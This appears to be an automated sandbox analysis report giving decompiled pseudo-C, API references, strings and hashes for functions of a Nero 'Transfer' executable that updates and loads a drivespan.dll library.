				intOrPtr _v548;
				short _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				char _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				char _v636;
				struct HINSTANCE__* _v640;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				char* _v664;
				intOrPtr _v668;
				char _v672;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t118;
				signed int _t119;
				char* _t125;
				intOrPtr _t128;
				struct HINSTANCE__* _t131;
				struct HINSTANCE__* _t134;
				void* _t137;
				int _t142;
				struct HINSTANCE__* _t148;
				struct HINSTANCE__* _t151;
				intOrPtr _t154;
				intOrPtr _t156;
				intOrPtr _t158;
				struct HINSTANCE__* _t168;
				struct HINSTANCE__* _t173;
				char* _t174;
				_Unknown_base(*)()* _t180;
				struct HINSTANCE__* _t184;
				void* _t204;
				void* _t205;
				char* _t207;
				intOrPtr* _t217;
				signed int _t218;
				signed int _t219;
				intOrPtr _t233;
				void* _t237;
				void* _t240;
				intOrPtr _t243;
				void* _t246;
				struct HINSTANCE__* _t247;
				void* _t248;
				signed int _t249;

				_t118 =  *0x896004; // 0x239cc77c
				_t119 = _t118 ^ _t249;
				_v20 = _t119;
				 *[fs:0x0] =  &_v16;
				_t247 = __ecx;
				_v640 = __ecx;
				_v672 = 0;
				_v568 = 7;
				_v572 = 0;
				_v588 = 0;
				E00881A90(_t204,  &_v588, L"drivespan.dll");
				_v8 = 0;
				E00884940(_t239,  &_v540, 0, 0x208);
				_t125 =  &_v540;
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t125, 0xd, _t119, _t239, _t246, _t204,  *[fs:0x0], E0088E012, 0xffffffff); // executed
				if(_t125 < 0) {
					E00881960(_t247,  &_v588);
					L44:
					_t128 = _v568;
					__eflags = _t128 - 8;
					if(_t128 < 8) {
						L47:
						 *[fs:0x0] = _v16;
						_pop(_t240);
						_pop(_t248);
						_pop(_t205);
						return E008825A8(_t205, _v20 ^ _t249, _t240, _t248);
					}
					_t131 = _t128 + 1;
					__eflags = _t131;
					_push(_t131);
					L46:
					_push(_v588);
					E00881C00(_t204, _t236, _t239);
					goto L47;
				}
				_v544 = 7;
				_v548 = 0;
				_v564 = 0;
				if(_v540 != 0) {
					_t217 =  &_v540;
					_t237 = _t217 + 2;
					do {
						_t134 =  *_t217;
						_t217 = _t217 + 2;
						__eflags = _t134;
					} while (_t134 != 0);
					_t218 = _t217 - _t237;
					__eflags = _t218;
					_t219 = _t218 >> 1;
					goto L6;
				} else {
					_t219 = 0;
					L6:
					_push(_t219);
					E00881A90(_t204,  &_v564,  &_v540);
					_t236 =  &_v564;
					_v8 = 1;
					_t137 = E008820F0( &_v636,  &_v564, L"\\Nero\\Transfer\\Update\\");
					_t241 = _t137;
					if( &_v564 != _t137) {
						_t199 = _v544;
						if(_v544 >= 8) {
							E00881C00(_t204,  &_v564, _t241, _v564, _t199 + 1);
						}
						_v544 = 7;
						_v548 = 0;
						_v564 = 0;
						E00881B90( &_v564, _t241);
					}
					_v8 = 1;
					_t139 = _v616;
					if(_v616 >= 8) {
						E00881C00(_t204, _t236, _t241, _v636, _t139 + 1);
					}
					_t239 = PathFileExistsW;
					_t141 =  >=  ? _v564 :  &_v564;
					_t142 = PathFileExistsW( >=  ? _v564 :  &_v564); // executed
					if(_t142 != 0) {
						E008820F0( &_v636,  &_v564, L"new_drivespan.dll");
						_v8 = 3;
						_t236 =  &_v564;
						E00882200( &_v612, _t236,  &_v588);
						_v8 = 4;
						__eflags = _v616 - 8;
						_t147 =  >=  ? _v636 :  &_v636;
						_t148 = PathFileExistsW( >=  ? _v636 :  &_v636);
						__eflags = _t148;
						if(_t148 != 0) {
							__eflags = _v592 - 8;
							_t231 =  >=  ? _v612 :  &_v612;
							__eflags = _v616 - 8;
							_t189 =  >=  ? _v636 :  &_v636;
							MoveFileExW( >=  ? _v636 :  &_v636,  >=  ? _v612 :  &_v612, 1);
						}
						__eflags = _v592 - 8;
						_t150 =  >=  ? _v612 :  &_v612;
						_t151 = PathFileExistsW( >=  ? _v612 :  &_v612);
						__eflags = _t151;
						if(_t151 == 0) {
							E00881960(_t247,  &_v588);
							_t154 = _v592;
							__eflags = _t154 - 8;
							if(_t154 >= 8) {
								__eflags = _t154 + 1;
								E00881C00(_t204, _t236, _t239, _v612, _t154 + 1);
							}
							_v592 = 7;
							_v612 = 0;
							_t156 = _v616;
							_v596 = 0;
							__eflags = _t156 - 8;
							if(_t156 >= 8) {
								__eflags = _t156 + 1;
								E00881C00(_t204, _t236, _t239, _v636, _t156 + 1);
							}
							_v616 = 7;
							_v636 = 0;
							_t158 = _v544;
							_v620 = 0;
							__eflags = _t158 - 8;
							if(_t158 >= 8) {
								__eflags = _t158 + 1;
								E00881C00(_t204, _t236, _t239, _v564, _t158 + 1);
							}
							_v544 = 7;
							_v548 = 0;
							_v564 = 0;
							goto L44;
						} else {
							__eflags = _v592 - 8;
							asm("xorps xmm0, xmm0");
							_t167 =  >=  ? _v612 :  &_v612;
							asm("movlpd [ebp-0x288], xmm0");
							_t168 = LoadLibraryW( >=  ? _v612 :  &_v612);
							_v640 = _t168;
							__eflags = _t168;
							if(_t168 == 0) {
								_v656 = _v648;
								_v648 = _v652;
							} else {
								_t184 = GetProcAddress(_t168, "ver");
								__eflags = _t184;
								if(_t184 == 0) {
									_v656 = _v648;
									_v648 = _v652;
									FreeLibrary(_v640);
								} else {
									_v648 = _t184->i();
									_v656 = _t236;
									FreeLibrary(_v640);
								}
							}
							__eflags = _v568 - 8;
							asm("xorps xmm0, xmm0");
							_t172 =  >=  ? _v588 :  &_v588;
							asm("movlpd [ebp-0x298], xmm0");
							_t173 = LoadLibraryW( >=  ? _v588 :  &_v588);
							_v640 = _t173;
							__eflags = _t173;
							if(_t173 == 0) {
								_t207 = _v664;
								_t243 = _v668;
							} else {
								_t180 = GetProcAddress(_t173, "ver");
								__eflags = _t180;
								if(_t180 == 0) {
									_t207 = _v664;
									_t243 = _v668;
									FreeLibrary(_v640);
								} else {
									_t243 =  *_t180();
									_t207 = _t236;
									FreeLibrary(_v640);
								}
							}
							__eflags = _v656 - _t207;
							if(__eflags < 0) {
								L35:
								_t174 =  &_v588;
								goto L34;
							} else {
								if(__eflags > 0) {
									L33:
									_t174 =  &_v612;
									L34:
									E00881960(_t247, _t174);
									E00881920( &_v612);
									E00881920( &_v636);
									E00881920( &_v564);
									E00881920( &_v588);
									goto L47;
								}
								__eflags = _v648 - _t243;
								if(_v648 <= _t243) {
									goto L35;
								}
								goto L33;
							}
						}
					} else {
						E00881960(_t247,  &_v588);
						_t193 = _v544;
						if(_v544 >= 8) {
							E00881C00(_t204, _t236, PathFileExistsW, _v564, _t193 + 1);
						}
						_t233 = _v568;
						_v544 = 7;
						_v548 = 0;
						_v564 = 0;
						if(_t233 < 8) {
							goto L47;
						} else {
							_push(_t233 + 1);
							goto L46;
						}
					}
				}
			}

0x00881017
0x0088101c
0x0088101e
0x00881028
0x0088102e
0x00881030
0x0088103a
0x0088104f
0x00881059
0x00881063
0x0088106a
0x0088107a
0x00881084
0x0088108c
0x0088109b
0x008810a3
0x008814d4
0x008814d9
0x008814d9
0x008814df
0x008814e2
0x008814f1
0x008814f6
0x008814fe
0x008814ff
0x00881500
0x0088150e
0x0088150e
0x008814e4
0x008814e4
0x008814e5
0x008814e6
0x008814e6
0x008814ec
0x00000000
0x008814ec
0x008810ab
0x008810b5
0x008810bf
0x008810cd
0x008810d3
0x008810d9
0x008810e0
0x008810e0
0x008810e3
0x008810e6
0x008810e6
0x008810eb
0x008810eb
0x008810ed
0x00000000
0x008810cf
0x008810cf
0x008810ef
0x008810ef
0x008810fd
0x00881107
0x0088110d
0x00881117
0x0088111f
0x00881129
0x0088112b
0x00881134
0x0088113e
0x0088113e
0x00881145
0x00881156
0x00881160
0x00881167
0x00881167
0x0088116c
0x00881170
0x00881179
0x00881183
0x00881183
0x00881195
0x0088119b
0x008811a3
0x008811a7
0x00881213
0x0088121e
0x00881223
0x0088122f
0x00881237
0x00881241
0x00881248
0x00881250
0x00881252
0x00881254
0x00881256
0x00881265
0x00881272
0x0088127a
0x00881282
0x00881282
0x00881288
0x00881295
0x0088129d
0x0088129f
0x008812a1
0x00881425
0x0088142a
0x00881430
0x00881433
0x00881435
0x0088143d
0x0088143d
0x00881444
0x0088144e
0x00881455
0x0088145b
0x00881465
0x00881468
0x0088146a
0x00881472
0x00881472
0x00881479
0x00881483
0x0088148a
0x00881490
0x0088149a
0x0088149d
0x0088149f
0x008814a7
0x008814a7
0x008814ae
0x008814b8
0x008814c2
0x00000000
0x008812a7
0x008812a7
0x008812ba
0x008812bd
0x008812c5
0x008812cd
0x008812d5
0x008812db
0x008812dd
0x0088133f
0x0088134b
0x008812df
0x008812e5
0x008812e7
0x008812e9
0x00881319
0x00881325
0x00881331
0x008812eb
0x008812f3
0x008812f9
0x008812ff
0x008812ff
0x008812e9
0x00881351
0x0088135e
0x00881361
0x00881369
0x00881371
0x00881373
0x00881379
0x0088137b
0x008813b7
0x008813bd
0x0088137d
0x00881383
0x00881385
0x00881387
0x008813a3
0x008813a9
0x008813af
0x00881389
0x00881391
0x00881393
0x00881395
0x00881395
0x00881387
0x008813c3
0x008813c9
0x00881414
0x00881414
0x00000000
0x008813cb
0x008813cb
0x008813d5
0x008813d5
0x008813db
0x008813de
0x008813e9
0x008813f4
0x008813ff
0x0088140a
0x00000000
0x0088140a
0x008813cd
0x008813d3
0x00000000
0x00000000
0x00000000
0x008813d3
0x008813c9
0x008811a9
0x008811b2
0x008811b7
0x008811c0
0x008811ca
0x008811ca
0x008811cf
0x008811d7
0x008811e1
0x008811eb
0x008811f5
0x00000000
0x008811fb
0x008811fc
0x00000000
0x008811fc
0x008811f5
0x008811a7

APIs

SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0088109B
PathFileExistsW.KERNELBASE(?,?), ref: 008811A3
PathFileExistsW.SHLWAPI(?), ref: 00881250
MoveFileExW.KERNEL32(?,?,00000001), ref: 00881282
PathFileExistsW.SHLWAPI(?), ref: 0088129D
LoadLibraryW.KERNEL32(?), ref: 008812CD
GetProcAddress.KERNEL32(00000000,ver), ref: 008812E5
FreeLibrary.KERNEL32(?), ref: 008812FF
FreeLibrary.KERNEL32(?), ref: 00881331
LoadLibraryW.KERNEL32(?), ref: 00881371
GetProcAddress.KERNEL32(00000000,ver), ref: 00881383
FreeLibrary.KERNEL32(?), ref: 00881395
FreeLibrary.KERNEL32(?), ref: 008813AF

Strings

drivespan.dll, xrefs: 00881044
\Nero\Transfer\Update\, xrefs: 00881102
new_drivespan.dll, xrefs: 00881202
ver, xrefs: 008812DF, 0088137D

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: Library$FileFreePath$Exists$AddressLoadProc$FolderMove
String ID: \Nero\Transfer\Update\$drivespan.dll$new_drivespan.dll$ver
API String ID: 2307531666-2570186640
Opcode ID: f9f37dbce6b1acaa43af3b930260a3c7566de9ab8c881e1f9ef3553bb61bd07f
Instruction ID: cc55e90172bbc5ad333cd3810470f95c7bc9c67b2cbca73897b1705c831dfd78
Opcode Fuzzy Hash: f9f37dbce6b1acaa43af3b930260a3c7566de9ab8c881e1f9ef3553bb61bd07f
Instruction Fuzzy Hash: 88D104749552299ADF60EB68CC9CBA9B7B9FF04304F1041E9E409E2251DB34AF86CF61

Uniqueness

Uniqueness Score: -1.00%

Function 008817A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 98
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E008817A0(void* __ebx, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v60;
				char _v68;
				intOrPtr _v72;
				char _v76;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t27;
				void* _t29;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				void* _t46;
				intOrPtr* _t47;
				signed int _t48;
				signed int _t49;
				void* _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				struct HINSTANCE__* _t64;
				void* _t65;
				signed int _t66;
				signed int _t68;

				_t46 = __ebx;
				_t68 = (_t66 & 0xfffffff8) - 0x40;
				_t23 =  *0x896004; // 0x239cc77c
				_v8 = _t23 ^ _t68;
				_t60 = _a12;
				_v40 = 8;
				_v36 = 0x80a0;
				__imp__InitCommonControlsEx( &_v40, _t59, _t62);
				_v48 = 7;
				_v52 = 0;
				_v68 = 0;
				if( *_t60 != 0) {
					_t47 = _t60;
					_t58 = _t47 + 2;
					do {
						_t27 =  *_t47;
						_t47 = _t47 + 2;
						__eflags = _t27;
					} while (_t27 != 0);
					_t48 = _t47 - _t58;
					__eflags = _t48;
					_t49 = _t48 >> 1;
					L5:
					_push(_t49);
					E00881A90(_t46,  &_v68, _t60);
					_t29 = E008822E0( &_v76, L"-Restart");
					_t52 = _v60;
					_t63 = _t29;
					if(_v60 >= 8) {
						E00881C00(_t46, _t58, _t60, _v72, _t52 + 1);
					}
					_t72 = _t63;
					if(_t63 == 0) {
						E00881510();
					}
					E00881000( &_v40, _t72); // executed
					_t32 =  >=  ? _v40 :  &_v40;
					_t33 = LoadLibraryW( >=  ? _v40 :  &_v40); // executed
					_t64 = _t33;
					if(_t64 != 0) {
						L12:
						_t34 = GetProcAddress(_t64, "run");
						if(_t34 != 0) {
							 *_t34(_t64, _t60, _a16);
							_t68 = _t68 + 0xc;
						}
						goto L14;
					} else {
						if(E008822E0( &_v40, L"drivespan.dll") == 0) {
							L14:
							FreeLibrary(_t64);
							_t36 = _v20;
							if(_v20 >= 8) {
								E00881C00(_t46, _t58, _t60, _v40, _t36 + 1);
							}
							_pop(_t61);
							_pop(_t65);
							return E008825A8(_t46, _v16 ^ _t68, _t61, _t65);
						}
						_t64 = LoadLibraryW(L"drivespan.dll");
						if(_t64 == 0) {
							goto L14;
						}
						goto L12;
					}
				}
				_t49 = 0;
				goto L5;
			}

0x008817a0
0x008817a6
0x008817a9
0x008817b0
0x008817b6
0x008817be
0x008817c6
0x008817ce
0x008817d6
0x008817de
0x008817e6
0x008817ee
0x008817f4
0x008817f6
0x00881800
0x00881800
0x00881803
0x00881806
0x00881806
0x0088180b
0x0088180b
0x0088180d
0x0088180f
0x0088180f
0x00881815
0x00881823
0x00881828
0x0088182c
0x00881831
0x00881839
0x00881839
0x0088183e
0x00881840
0x00881842
0x00881842
0x0088184b
0x00881859
0x0088185f
0x00881865
0x00881869
0x0088188e
0x00881894
0x0088189c
0x008818a3
0x008818a5
0x008818a5
0x00000000
0x0088186b
0x0088187b
0x008818a8
0x008818a9
0x008818af
0x008818b6
0x008818be
0x008818be
0x008818c9
0x008818ca
0x008818d5
0x008818d5
0x00881888
0x0088188c
0x00000000
0x00000000
0x00000000
0x0088188c
0x00881869
0x008817f0
0x00000000

APIs

InitCommonControlsEx.COMCTL32 ref: 008817CE
LoadLibraryW.KERNELBASE(?,?,?,?,-Restart,?,?), ref: 0088185F
LoadLibraryW.KERNEL32(drivespan.dll,drivespan.dll,?,?,?,-Restart,?,?), ref: 00881882
GetProcAddress.KERNEL32(00000000,run), ref: 00881894
FreeLibrary.KERNEL32(00000000,?,?,?,-Restart,?,?), ref: 008818A9

Strings

drivespan.dll, xrefs: 0088186B, 0088187D
run, xrefs: 0088188E
-Restart, xrefs: 0088181A

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: Library$Load$AddressCommonControlsFreeInitProc
String ID: -Restart$drivespan.dll$run
API String ID: 1924428465-1486268468
Opcode ID: 58363078f3a5c5e0f454bd023b259fd8fe0ed1554c81943e99600a99154b2d50
Instruction ID: 67f8431a3276ecc2dcfa6c7465379ff6beaafca3f48f41f3cdefc919f15897fe
Opcode Fuzzy Hash: 58363078f3a5c5e0f454bd023b259fd8fe0ed1554c81943e99600a99154b2d50
Instruction Fuzzy Hash: 65317C305146019FCB14BB28D84AA6FB7E8FF85755F04492CF896D2251EF34DA06CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00882F17 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00882F17() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00882F23); // executed
				return _t1;
			}

0x00882f1c
0x00882f22

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00002F23,008826A2), ref: 00882F1C

Strings

Pdqt, xrefs: 00882F1C

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID: Pdqt
API String ID: 3192549508-3302706896
Opcode ID: 40a45dd1558eb002138cbe10e910bab52b2d66d63ea304cba6cebdf480c64cff
Instruction ID: 3d51fc811576408a50927252b3d8f76a0fd3459134a92f2e439d90631d7e477c
Opcode Fuzzy Hash: 40a45dd1558eb002138cbe10e910bab52b2d66d63ea304cba6cebdf480c64cff
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00888169 Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00888169(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E00888132(_t19) - _t19 >> 1) + (E00888132(_t19) - _t19 >> 1);
					_t6 = E00886B4A(_t14, (E00888132(_t19) - _t19 >> 1) + (E00888132(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0088D7F0(_t18, _t19, _t12);
					}
					E00886B10(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}

0x00888169
0x00888173
0x00888177
0x00888188
0x0088818c
0x00888191
0x00888197
0x0088819c
0x008881a1
0x008881a6
0x008881ad
0x00888179
0x00888179
0x00888179
0x008881b8

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0088816D
_free.LIBCMT ref: 008881A6
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008881AD

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: EnvironmentStrings$Free_free
String ID:
API String ID: 2716640707-0
Opcode ID: 729ffa5ca134a362f5a5369f54128cd8c38490464e30c7f6d5af02b96c5dec29
Instruction ID: 73140b80db5e886705cfc4eba8a4bc1120c2d4ed61ca45c5d4c1a9cb1ab4db90
Opcode Fuzzy Hash: 729ffa5ca134a362f5a5369f54128cd8c38490464e30c7f6d5af02b96c5dec29
Instruction Fuzzy Hash: 8EE06D7B584925AE9262332DAC89E6B3A1DFFC17B9B650025F504D6186EE148D1343B2

Uniqueness

Uniqueness Score: -1.00%

Function 00888654 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00888654(void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t30;
				char _t31;
				void* _t33;
				intOrPtr* _t35;

				_push(_t26);
				_push(_t26);
				_t16 = E00886BDB(_t26, 0x40, 0x30); // executed
				_t31 = _t16;
				_v12 = _t31;
				_t28 = _t30;
				if(_t31 != 0) {
					_t2 = _t31 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t31 - _t17;
					if(__eflags != 0) {
						_t3 = _t31 + 0x20; // 0x20
						_t35 = _t3;
						_t33 = _t17;
						do {
							_t4 = _t35 - 0x20; // 0x0
							E0088842B(0, _t28, _t33, __eflags, _t4, 0xfa0, 0);
							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
							 *_t35 = 0;
							_t35 = _t35 + 0x30;
							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
							 *((char*)(_t35 - 0x24)) = 0xa;
							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
							 *((char*)(_t35 - 0x22)) = 0;
							__eflags = _t35 - 0x20 - _t33;
						} while (__eflags != 0);
						_t31 = _v12;
					}
				} else {
					_t31 = 0;
				}
				E00886B10(0);
				return _t31;
			}

0x00888659
0x0088865a
0x00888661
0x00888666
0x0088866a
0x0088866e
0x00888671
0x00888677
0x00888677
0x0088867d
0x0088867f
0x00888682
0x00888682
0x00888685
0x00888687
0x0088868d
0x00888691
0x00888696
0x0088869a
0x0088869c
0x0088869f
0x008886a5
0x008886ac
0x008886b0
0x008886b4
0x008886b7
0x008886b7
0x008886bb
0x008886be
0x00888673
0x00888673
0x00888673
0x008886c0
0x008886cd

APIs

Part of subcall function 00886BDB: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00886C1C

_free.LIBCMT ref: 008886C0

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: d3ebc13b0ebbb74cb065b0f551faa43160cc8f1f2a8b1336f13c8a4004e98a34
Instruction ID: 60e16295af74f5fa8eccebb413d51bd464c55cd75141d1f9a9a21673eb73834f
Opcode Fuzzy Hash: d3ebc13b0ebbb74cb065b0f551faa43160cc8f1f2a8b1336f13c8a4004e98a34
Instruction Fuzzy Hash: A4012672200305ABE321EF698885D5AFBD9FB95374F65061DE584C3280FB30A805C764

Uniqueness

Uniqueness Score: -1.00%

Function 00886BDB Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00886BDB(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x897358, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E008864E4();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E008873D2())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00885815(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00886bdb
0x00886be1
0x00886be6
0x00886bf4
0x00886bf4
0x00886bfa
0x00886bfc
0x00886bfc
0x00886c13
0x00886c1c
0x00886c24
0x00000000
0x00000000
0x00886c04
0x00886c06
0x00886c28
0x00886c2d
0x00886c33
0x00000000
0x00886c33
0x00886c09
0x00886c0e
0x00886c0f
0x00886c11
0x00000000
0x00000000
0x00886c11
0x00000000
0x00886c13
0x00886bec
0x00886bf2
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00886C1C

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 26bd522d6ea9eddbe96e3fab9fc7f6614df30d24a62f9253c06236e0f40c43bc
Instruction ID: b728d00075dd5050ae0734329a3964848cb60c69d94c82fd11c6c4892261b6b4
Opcode Fuzzy Hash: 26bd522d6ea9eddbe96e3fab9fc7f6614df30d24a62f9253c06236e0f40c43bc
Instruction Fuzzy Hash: 2AF0E9315456296ADB313B268C01B5A7B99FF41774B148032AC88EB291EF30D86197E1

Uniqueness

Uniqueness Score: -1.00%

Function 00886B4A Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00886B4A(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E008873D2())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x897358, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E008864E4();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00885815(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00886b4a
0x00886b50
0x00886b56
0x00886b88
0x00886b8d
0x00886b93
0x00000000
0x00886b93
0x00886b5a
0x00886b5c
0x00886b5c
0x00886b73
0x00886b7c
0x00886b84
0x00000000
0x00000000
0x00886b64
0x00886b66
0x00000000
0x00000000
0x00886b69
0x00886b6e
0x00886b6f
0x00886b71
0x00000000
0x00000000
0x00886b71
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,0088330B,?), ref: 00886B7C

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c65088122ff8260dfb56112ce25a8b96b5169138691f43d878e73024cc35d2a3
Instruction ID: b4517bf679df418c1f18c6ddc7284907557060a6e783b2817ee02614d6b4128b
